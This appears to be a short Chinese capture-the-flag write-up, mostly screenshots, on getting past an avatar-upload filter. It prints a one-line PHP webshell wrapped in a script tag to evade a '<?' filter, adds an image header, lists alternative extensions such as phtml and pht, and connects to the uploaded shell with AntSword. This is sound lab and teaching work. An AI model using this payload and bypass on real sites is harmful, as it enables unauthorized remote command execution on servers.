![](https://img-blog.csdnimg.cn/8ea8937d95e84da484ccde760f2e279e.png)
上传头像,上传一下,看看能不能成功
![](https://img-blog.csdnimg.cn/c2e1417ceac34e818f4261ce0b4bc6f0.png)
抓包,抓取上传时的数据,看看限制条件
![](https://img-blog.csdnimg.cn/a3f5964c5e234b9191f130311a2c2aff.png)
改两个地方,符合上传图片的要求,上传试试
![](https://img-blog.csdnimg.cn/9e44416c0ebb4025bdd2d72b594fcf30.png)
一句话木马的<?被扳了
![](https://img-blog.csdnimg.cn/9a0982e863e945c1a7d99b2bd40a2a78.png)
改一下木马的格式
<script language="php">eval($_POST['cmd']);</script>
![](https://img-blog.csdnimg.cn/70ccb4b46638413f879d6323c379a08d.png)
别骗我,这不是图片
加一个图片头
![](https://img-blog.csdnimg.cn/bdfcd85a1f3941f7bf7b5a994bb4fc80.png)
但是此时文件格式为.jpg我们利用不了
所以,换成没有被过滤的网页格式
ps(补充):文件绕过的格式php,php3,php4,php5,phtml.pht
phtml没有被过滤,可以使用
![](https://img-blog.csdnimg.cn/72b7ba48403c4296bb4701cd0aab8f3c.png)
上传成功,下面就要看看,上传的文件被放在了什么位置
根据题目提示,大胆猜测文件位置在/upload/1.phtml
先访问一下/upload
![](https://img-blog.csdnimg.cn/c25ae4063e304f759c81861f5229ddbe.png)
果然在这里
下面,打开蚁剑连接
![](https://img-blog.csdnimg.cn/b61a95132e764266879183cfc2b2fd88.png)
连接成功
![](https://img-blog.csdnimg.cn/ceef84513bc44642b280c3190af815ac.png)